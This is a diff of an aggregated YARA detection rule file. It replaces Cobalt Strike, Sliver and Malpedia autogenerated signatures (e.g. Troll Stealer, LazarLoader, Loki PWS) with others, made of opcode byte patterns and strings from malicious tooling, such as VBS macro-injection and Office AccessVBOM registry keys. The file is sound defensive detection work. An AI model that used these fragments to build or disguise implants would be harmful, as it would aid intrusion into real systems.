 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1"
-		logic_hash = "cab5441ce7d919101fc04aa469e77b71a4c444443e44c752f18cbbc5b17ed5c2"
+		hash = "3ac9c3525caa29981775bddec43d686c0e855271f23731c376ba48761c27fa3d"
+		logic_hash = "0c8934e997583339145749a3167ac010d8c77b2ed878d2c999de68ec2a98101d"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 45 B0 56
-      C6 45 B1 69
-      C6 45 B2 72
-      C6 45 B3 74
-      C6 45 B4 75
-      C6 45 B5 61
-      C6 45 B6 6C
-      C6 45 B7 41
-      C6 45 B8 6C
-      C6 45 B9 6C
-      C6 45 BA 6F
-      C6 45 BB 63
-      C6 45 BC 00
-    }
-		$deobfuscator = {
-      8B 4D FC
-      83 C1 01
-      89 4D FC
-      8B 55 FC
-      3B 55 0C
-      73 19
-      0F B6 45 10
-      8B 4D 08
-      03 4D FC
-      0F BE 11
-      33 D0
-      8B 45 08
-      03 45 FC
-      88 10
-      EB D6
-    }
+		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 D3 88 FF FF
+                     4C 8D 05 84 6E FF FF 8B D0 49 8B CA 48 83 C4 28 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$core_sig and not $deobfuscator
+		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X64_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_4_V_4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.HA.x64.o (HeapAlloc) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.4 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "9b16ff13-2d8e-51dc-9f99-6c45eff76feb"
+		id = "79b6bfd4-1e45-5bd9-ac5c-19eb176ce698"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L281-L323"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1593-L1628"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "d64f10d5a486f0f2215774e8ab56087f32bef19ac666e96c5627c70d345a354d"
-		logic_hash = "b712a0c218e473f6c64fdead22b291d7fb0bac8ba614adcf1ba6431e854a5e65"
+		hash = "3280fec57b7ca94fd2bdb5a4ea1c7e648f565ac077152c5a81469030ccf6ab44"
+		logic_hash = "be0bbf58a176f8089924b3ce58268d906f49dde51d863524971e46f4bada43a3"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 44 24 38 48
-      C6 44 24 39 65
-      C6 44 24 3A 61
-      C6 44 24 3B 70
-      C6 44 24 3C 41
-      C6 44 24 3D 6C
-      C6 44 24 3E 6C
-      C6 44 24 3F 6F
-      C6 44 24 40 63
-      C6 44 24 41 00
-    }
+		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 83 88 FF FF
+                     4C 8D 05 A4 6D FF FF 8B D0 49 8B CA 48 83 C4 28 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X64_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_5_Variant
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x64.o (MapViewOfFile) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.5 (variant)"
 		author = "gssincla@google.com"
-		id = "38e063db-3d76-5a94-812a-945fcf46a232"
+		id = "45715da9-8f16-5304-b216-1ca36c508c77"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L326-L374"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1630-L1665"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "9d5b6ccd0d468da389657309b2dc325851720390f9a5f3d3187aff7d2cd36594"
-		logic_hash = "6224000342d87041fd3336656897479c644e94ea36fc061c27fcd64233047c2c"
+		hash = "8f0da7a45945b630cd0dfb5661036e365dcdccd085bc6cff2abeec6f4c9f1035"
+		logic_hash = "31a108168489a24d1bc297d722741f3fd19abd1bed4c76d54967c73986d18123"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 44 24 58 4D
-      C6 44 24 59 61
-      C6 44 24 5A 70
-      C6 44 24 5B 56
-      C6 44 24 5C 69
-      C6 44 24 5D 65
-      C6 44 24 5E 77
-      C6 44 24 5F 4F
-      C6 44 24 60 66
-      C6 44 24 61 46
-      C6 44 24 62 69
-      C6 44 24 63 6C
-      C6 44 24 64 65
-    }
+		$version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 E8 AB FF FF
+                     8B D0 49 8B CA E8 1A EB FF FF 48 83 C4 28 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X64_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Browserpivot_X64_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_X64_Dll_V4_0_To_V4_X
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's resources/browserpivot.x64.bin from v1.48 to v3.14 and sleeve/browserpivot.x64.dll from v4.0 to at least v4.4"
 		author = "gssincla@google.com"
-		id = "8ca04f82-a8a8-5162-8b0c-8a7bce678a85"
+		id = "a5dfae85-ff9c-5ca5-9ac0-041c6108a6ed"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L376-L456"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_x64_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_x64_Dll_v4_0_to_v4_x.yara#L17-L64"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9"
-		logic_hash = "17402e952d71d02274a9b2814512b28a402e8d11a6c2a2375844fe24719f87a6"
+		hash = "0ad32bc4fbf3189e897805cec0acd68326d9c6f714c543bafb9bc40f7ac63f55"
+		logic_hash = "a59f19b6e258b724ed88b4255717d066319ba5fb0838d6c6ed11355e9d9b1c22"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$core_sig = {
-      C6 44 24 48 56
-      C6 44 24 49 69
-      C6 44 24 4A 72
-      C6 44 24 4B 74
-      C6 44 24 4C 75
-      C6 44 24 4D 61
-      C6 44 24 4E 6C
-      C6 44 24 4F 41
-      C6 44 24 50 6C
-      C6 44 24 51 6C
-      C6 44 24 52 6F
-      C6 44 24 53 63
-      C6 44 24 54 00
-    }
-		$deobfuscator = {
-      8B 04 24
-      FF C0
-      89 04 24
-      8B 44 24 28
-      39 04 24
-      73 20
-      8B 04 24
-      0F B6 4C 24 30
-      48 8B 54 24 20
-      0F BE 04 02
-      33 C1
-      8B 0C 24
-      48 8B 54 24 20
-      88 04 0A
-    }
+		$socket_recv = {
+			FF 15 [4]
+			83 ?? FF
+			74 ??
+			85 ??
+			74 ??
+			03 ??
+			83 ?? 02
+			72 ??
+			8D ?? FF
+			80 [2] 0A
+			75 ??
+			8D ?? FE
+			80 [2] 0D
+		}
+		$fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]"
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X64_O_V4_3_V4_4_V4_5_And_V4_6
+rule GCTI_Cobaltstrike_Resources_Dnsstager_Bin_V1_47_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's sleeve/BeaconLoader.x64.o (Base) Versions 4.3 through at least 4.6"
+		description = "Cobalt Strike's resources/dnsstager.bin signature for versions 1.47 to 4.x"
 		author = "gssincla@google.com"
-		id = "07f751e4-f001-5b95-b229-31fbaa867cea"
+		id = "e1b0e368-9bcf-5d9b-b2b3-8414742f213e"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L458-L555"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Dnsstager_Bin_v1_47_through_v4_x.yara#L17-L78"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9"
-		logic_hash = "50d9da466e2c074b3fb634203c8840d45da8f8e3094790d7c4354a5703b583ef"
+		hash = "10f946b88486b690305b87c14c244d7bc741015c3fef1c4625fa7f64917897f1"
+		logic_hash = "d4500d8a83a821e1df9e808b17a87c1207d78ea0e03886544a632176fe93ccd0"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = ""
 
 	strings:
-		$core_sig = {
-      33 C0
-      83 F8 01
-      74 63
-      48 8B 44 24 20
-      0F B7 00
-      3D 4D 5A 00 00
-      75 45
-      48 8B 44 24 20
-      48 63 40 3C
-      48 89 44 24 28
-      48 83 7C 24 28 40
-      72 2F
-      48 81 7C 24 28 00 04 00 00
-      73 24
-      48 8B 44 24 20
-      48 8B 4C 24 28
-      48 03 C8
-      48 8B C1
-      48 89 44 24 28
-      48 8B 44 24 28
-      81 38 50 45 00 00
-      75 02
-    }
-		$deobfuscator = {
-      8B 04 24
-      FF C0
-      89 04 24
-      8B 44 24 28
-      39 04 24
-      73 20
-      8B 04 24
-      0F B6 4C 24 30
-      48 8B 54 24 20
-      0F BE 04 02
-      33 C1
-      8B 0C 24
-      48 8B 54 24 20
-      88 04 0A
-    }
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
+			75 ??
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
+		}
+		$dnsapi = { 68 64 6E 73 61 }
 
 	condition:
-		$core_sig and not $deobfuscator
+		$apiLocator and $dnsapi
 }
 rule GCTI_Cobaltstrike_Resources_Bind64_Bin_V2_5_Through_V4_X
 {
@@ -81899,43 +81771,118 @@ rule GCTI_Cobaltstrike_Resources_Bind64_Bin_V2_5_Through_V4_X
 	condition:
 		$apiLocator and $calls
 }
-rule GCTI_Cobaltstrike_Resources__Template_Vbs_V3_3_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Httpsstager64_Bin_V3_2_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/btemplate.vbs signature for versions v3.3 to v4.x"
+		description = "Cobalt Strike's resources/httpsstager64.bin signature for versions v3.2 to v4.x"
 		author = "gssincla@google.com"
-		id = "62f35d02-1e4e-5651-b575-888ce06b8bdd"
+		id = "c16e73fc-484a-5f7e-8127-d85a0254d842"
 		date = "2022-11-18"
-		modified = "2022-11-22"
+		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Vbs_v3_3_to_v4_x.yara#L17-L41"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager64_Bin_v3_2_through_v4_x.yara#L17-L90"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "e0683f953062e63b2aabad7bc6d76a78748504b114329ef8e2ece808b3294135"
-		logic_hash = "c9df0e287eb0eacf7c6cfcf3f6d1043ae6f2fdacd3b22bd42ac71f4b0d7226ff"
+		hash = "109b8c55816ddc0defff360c93e8a07019ac812dd1a42209ea7e95ba79b5a573"
+		logic_hash = "4889a23c1f2780044b9fb2a0207676d57e82e6c1275614b684a5a9cbe984b761"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = ""
 
 	strings:
-		$ea = "Excel.Application" nocase
-		$vis = "Visible = False" nocase
-		$wsc = "Wscript.Shell" nocase
-		$regkey1 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" nocase
-		$regkey2 = "\\Excel\\Security\\AccessVBOM" nocase
-		$regwrite = ".RegWrite" nocase
-		$dw = "REG_DWORD"
-		$code = ".CodeModule.AddFromString"
-		$ao = { 41 75 74 6f 5f 4f 70 65 6e }
-		$da = ".DisplayAlerts"
+		$apiLocator = {
+			48 [2]
+			AC
+			41 [2] 0D
+			41 [2]
+			38 ??
+			75 ??
+			4C [4]
+			45 [2]
+			75 ??
+			5?
+			44 [2] 24
+			49 [2]
+			66 [4]
+			44 [2] 1C
+			49 [2]
+			41 [3]
+			48
+		}
+		$InternetSetOptionA = {
+			BA 1F 00 00 00
+			6A 00
+			68 80 33 00 00
+			49 [2]
+			41 ?? 04 00 00 00
+			41 ?? 75 46 9E 86
+		}
 
 	condition:
-		all of them
+		$apiLocator and $InternetSetOptionA
+}
+rule GCTI_Sliver_Implant_32Bit
+{
+	meta:
+		description = "Sliver 32-bit implant (with and without --debug flag at compile)"
+		author = "gssincla@google.com"
+		id = "6bc4d7d1-64cf-5920-8f07-54a8a7a94f26"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/Sliver/Sliver__Implant_32bit.yara#L17-L81"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "911f4106350871ddb1396410d36f2d2eadac1166397e28a553b28678543a9357"
+		logic_hash = "5b394a198f691b6777438a69d20a423798525daa84a09a0ce346eca5bb66f850"
+		score = 60
+		quality = 35
+		tags = ""
+
+	strings:
+		$s_tcppivot = { 81 ?? 74 63 70 70 [2-20] 81 ?? 04 69 76 6F 74  }
+		$s_wg = { 66 81 ?? 77 67 }
+		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
+		$s_http = { 81 ?? 68 74 74 70 }
+		$s_https = { 81 ?? 68 74 74 70 [2-20] 80 ?? 04 73 }
+		$s_mtls = { 81 ?? 6D 74 6C 73 }
+		$fp1 = "cloudfoundry" ascii fullword
+
+	condition:
+		4 of ( $s* ) and not 1 of ( $fp* )
+}
+rule GCTI_Sliver_Implant_64Bit
+{
+	meta:
+		description = "Sliver 64-bit implant (with and without --debug flag at compile)"
+		author = "gssincla@google.com"
+		id = "b84db933-0e11-5871-821d-43697c015665"
+		date = "2022-11-18"
+		modified = "2022-11-19"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/Sliver/Sliver__Implant_64bit.yara#L17-L84"
+		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
+		hash = "2d1c9de42942a16c88a042f307f0ace215cdc67241432e1152080870fe95ea87"
+		logic_hash = "ad4ceef08a732174c8ccbcacf0370b26acb9e5ec0784d8827c8104618e018a26"
+		score = 75
+		quality = 85
+		tags = ""
+
+	strings:
+		$s_tcppivot = { 48 ?? 74 63 70 70 69 76 6F 74 }
+		$s_namedpipe = { 48 ?? 6E 61 6D 65 64 70 69 70 [2-32] 80 ?? 08 65 }
+		$s_https = { 81 ?? 68 74 74 70 [2-32] 80 ?? 04 73 }
+		$s_wg = {66 81 ?? 77 67}
+		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
+		$s_mtls = {  81 ?? 6D 74 6C 73  }
+		$fp1 = "cloudfoundry" ascii fullword
+
+	condition:
+		5 of ( $s* ) and not 1 of ( $fp* )
 }
 /*
  * YARA Rule Set
  * Repository Name: Malpedia
  * Repository: https://github.com/malpedia/signator-rules/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 173f2e2012643b57ff6521a58ba6dd57331de3c6
  * Number of Rules: 1603
  * Skipped: 0 (age), 17 (quality), 0 (score), 0 (importance)
@@ -81945,18 +81892,18 @@ rule GCTI_Cobaltstrike_Resources__Template_Vbs_V3_3_To_V4_X
  *
  * NO LICENSE SET
  */
-rule MALPEDIA_Win_Seduploader_Auto : FILE
+rule MALPEDIA_Win_Troll_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8fb6991a-2035-5d98-8418-a7713bf4dcf3"
+		id = "40759ced-a25e-5434-bc7c-501cfe15d47a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.seduploader_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.troll_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.troll_stealer_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "322f530e99af9eadb7926bd0383665644ca1fdc1bbd87072e1c813cec7a54a88"
+		logic_hash = "5f0403028aceb1e51ecaa890b1a7ca49efec2e1c71ccfd760d9d2619abef354a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81970,34 +81917,34 @@ rule MALPEDIA_Win_Seduploader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff763c e8???????? 83c40c 3b4508 }
-		$sequence_1 = { 50 e8???????? 8b4510 83c6fe 8930 8d4601 50 }
-		$sequence_2 = { 8b4510 83c6fe 8930 8d4601 50 e8???????? }
-		$sequence_3 = { 83c6fe 8930 8d4601 50 e8???????? }
-		$sequence_4 = { 8b4510 83c6fe 8930 8d4601 }
-		$sequence_5 = { e8???????? 8b4510 83c6fe 8930 8d4601 }
-		$sequence_6 = { 56 6a3e 8bf1 e8???????? }
-		$sequence_7 = { 8b4510 83c6fe 8930 8d4601 50 }
-		$sequence_8 = { 50 e8???????? 8b4510 83c6fe 8930 }
-		$sequence_9 = { 83c6fe 8930 8d4601 50 }
+		$sequence_0 = { 49895008 6699 49894010 0fb7d5 9c c0f2b0 66d3f2 }
+		$sequence_1 = { d0ca 80c2f3 f9 f8 d0c2 4432ca f7c465491a38 }
+		$sequence_2 = { f7d2 f9 d1c2 4153 41ffc3 311424 415b }
+		$sequence_3 = { 4181eb2315e85c 313424 458bdd 49c7c33109c930 }
+		$sequence_4 = { 81d9d83d744a f6d2 80c253 0fbfc8 d2cd d0c2 }
+		$sequence_5 = { 313c24 480fbafbc6 c1eb14 480fb7da 5b 4863ff f8 }
+		$sequence_6 = { 453bf3 4153 311424 664181eb996f 415b f9 4863d2 }
+		$sequence_7 = { 4d8d141a 48bd0000000002000000 4d8d142a 410fc1f9 4c8bc4 4881ec80010000 450fbfc8 }
+		$sequence_8 = { 403ad4 81f6a540bf26 f7d6 f5 d1c6 f8 f7d6 }
+		$sequence_9 = { 4112eb 418910 4080dd61 40fec5 660bef 418b2b 4981c304000000 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 45868032
 }
-rule MALPEDIA_Win_Rikamanu_Auto : FILE
+rule MALPEDIA_Win_Lazarloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6aa1bb34-6dad-5a44-a7b0-10e6f22d5ad7"
+		id = "4eef2499-48c5-5b94-8dd0-29267a0265f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rikamanu_auto.yar#L1-L301"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lazarloader_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "bec31db5b7da98c4f1592bb94bd04c2338666fc78eaa33ae09c8491dda001ca5"
+		logic_hash = "176d7f7f65178334e7677ff59a660edd6b016ed103feffa239e5ccc53e031e90"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82009,51 +81956,32 @@ rule MALPEDIA_Win_Rikamanu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 6a14 ff15???????? a801 }
-		$sequence_1 = { 50 ff15???????? 8b35???????? 3d80969800 }
-		$sequence_2 = { 40 3acb 75f9 57 8dbdf4fdffff 2bc2 4f }
-		$sequence_3 = { 8d4c2414 51 56 ff15???????? 8b542414 52 }
-		$sequence_4 = { 0fb6da f68321ae400004 740c ff01 85f6 }
-		$sequence_5 = { 33c0 890d???????? bf???????? 890d???????? 890d???????? 890d???????? }
-		$sequence_6 = { 7423 83c604 803e00 7587 53 57 ff15???????? }
-		$sequence_7 = { 58 668986b8000000 668986be010000 c74668b02f4100 83a6b803000000 6a0d }
-		$sequence_8 = { 83d8ff 85c0 0f841f020000 83c9ff }
-		$sequence_9 = { e8???????? 59 3bc3 7511 391d???????? 7509 ff750c }
-		$sequence_10 = { 59 8b7508 8d34f570902400 391e 7404 8bc7 eb6d }
-		$sequence_11 = { 33c5 8945fc 8b0d???????? 53 6804010000 33db 8d85f8feffff }
-		$sequence_12 = { 888800962400 40 ebe9 33c0 8945e4 3d00010000 7d10 }
-		$sequence_13 = { 8b842470020000 03f8 57 56 ff15???????? 5f 5e }
-		$sequence_14 = { ff15???????? 8b8df0fdffff 8b35???????? 51 ffd6 8b95e8fdffff 52 }
-		$sequence_15 = { ff35???????? ff15???????? c3 ff35???????? ff742408 }
-		$sequence_16 = { f3a5 8bca 83e103 f3a4 8dbc243c020000 83c9ff f2ae }
-		$sequence_17 = { 7229 f3a5 ff2495d85a4000 8bc7 ba03000000 83e904 720c }
-		$sequence_18 = { ffd6 85c0 74c2 8b85ccfdffff 6aff }
-		$sequence_19 = { f3a5 8bca 6880000000 83e103 6a04 f3a4 }
-		$sequence_20 = { 52 ff15???????? 8b8c2470020000 8bf8 8d442414 }
-		$sequence_21 = { 53 56 6a01 68???????? e8???????? 6a01 }
-		$sequence_22 = { e8???????? 68ff000000 8d85e9f9ffff 889de8f9ffff 53 50 e8???????? }
-		$sequence_23 = { 50 a3???????? e8???????? 8db67c774000 bf???????? a5 a5 }
-		$sequence_24 = { c1f905 83e21f 8b0c8de0b84000 f644d10401 7425 50 e8???????? }
-		$sequence_25 = { 83c9ff 33c0 8b1d???????? f2ae f7d1 6a00 }
-		$sequence_26 = { 55 6803000010 57 ffd6 3b442410 0f8584040000 b940000000 }
-		$sequence_27 = { ff7510 50 ff7508 ff15???????? 5e 5d c21000 }
-		$sequence_28 = { 56 57 8b7d0c 85db 0f84b2000000 85ff 0f84aa000000 }
+		$sequence_0 = { 48894de8 488945f0 488d15a0bd0000 b805000000 894520 894528 }
+		$sequence_1 = { 488bd7 4c8d05fecd0000 83e23f 488bcf }
+		$sequence_2 = { 33c0 b906020000 f3aa 33c0 66898424d0060000 488d8424d2060000 488bf8 }
+		$sequence_3 = { 488bc2 e9???????? 493bec 0f84be000000 8b7500 33c0 f04d0fb1bcf120ba0100 }
+		$sequence_4 = { 4889842490000000 488b442470 0fb700 6689442432 488b442458 0fb74c2432 }
+		$sequence_5 = { 4885c9 7430 53 4883ec20 488d0563810000 }
+		$sequence_6 = { eb19 488d1dec1e0100 eb10 488d1df31e0100 eb07 488d1dd21e0100 }
+		$sequence_7 = { 4883ec20 e8???????? 488b05???????? 488d1da7710100 }
+		$sequence_8 = { e8???????? 89442460 33c9 e8???????? }
+		$sequence_9 = { 85c0 750d 488bcb e8???????? e9???????? 4c8d2557230100 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 364544
 }
-rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE
+rule MALPEDIA_Win_Lokipws_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "afe83831-af08-566c-bd71-ab10e23239e8"
+		id = "7c0fcf43-8505-5ab1-9538-f95766af9b37"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ccleaner_backdoor_auto.yar#L1-L275"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lokipws_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "be44c857d399380efa2dec8cf50305b24c9727966e69281b9da9b0167cac9243"
+		logic_hash = "a16d167a015bb2f0bb35ba7d5dec0418ca90b6fc4e94e3d241cc5d1eead21a9c"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -82067,53 +81995,32 @@ rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 50 ff15???????? 8b3d???????? 59 ffd7 }
-		$sequence_1 = { 8a11 305103 8b480c 8b09 8a5101 }
-		$sequence_2 = { 03c6 85c0 7f09 488b0a 488b01 ff5008 488b4b28 }
-		$sequence_3 = { 01442424 eb30 8b4508 897518 }
-		$sequence_4 = { 8d856cffffff 6a0c 50 c7856cffffff11618a64 c78570ffffff470de38d c78574ffffff27defaf2 e8???????? }
-		$sequence_5 = { 013e 33c0 8b16 83c410 }
-		$sequence_6 = { 03c6 4863d0 4c8d0c12 4c8d4718 }
-		$sequence_7 = { 33f6 6a1c 8d45e4 59 c60000 }
-		$sequence_8 = { 01cc cc 48895c2408 57 }
-		$sequence_9 = { 03c0 894340 8b7340 418bc4 }
-		$sequence_10 = { 83c410 8d85fcfeffff 50 ff15???????? be00010000 }
-		$sequence_11 = { 8b450c 53 56 8b7508 8b5510 03c6 }
-		$sequence_12 = { 03cd 41 8a01 4c 03cd 8802 }
-		$sequence_13 = { 6844494e00 e8???????? 8365e400 8945e0 8d4508 6a04 }
-		$sequence_14 = { 83e805 743a 48 7409 }
-		$sequence_15 = { 7507 33c0 e9???????? e8???????? 6800000100 6a40 }
-		$sequence_16 = { 01442454 03d1 294c2450 8b4c2410 }
-		$sequence_17 = { 01460c 488b3f 493bfc 0f8554ffffff }
-		$sequence_18 = { 01461c 8b542424 85d2 7405 }
-		$sequence_19 = { 0fb645f8 50 8d45d8 50 }
-		$sequence_20 = { 012e 33c0 5f 5e }
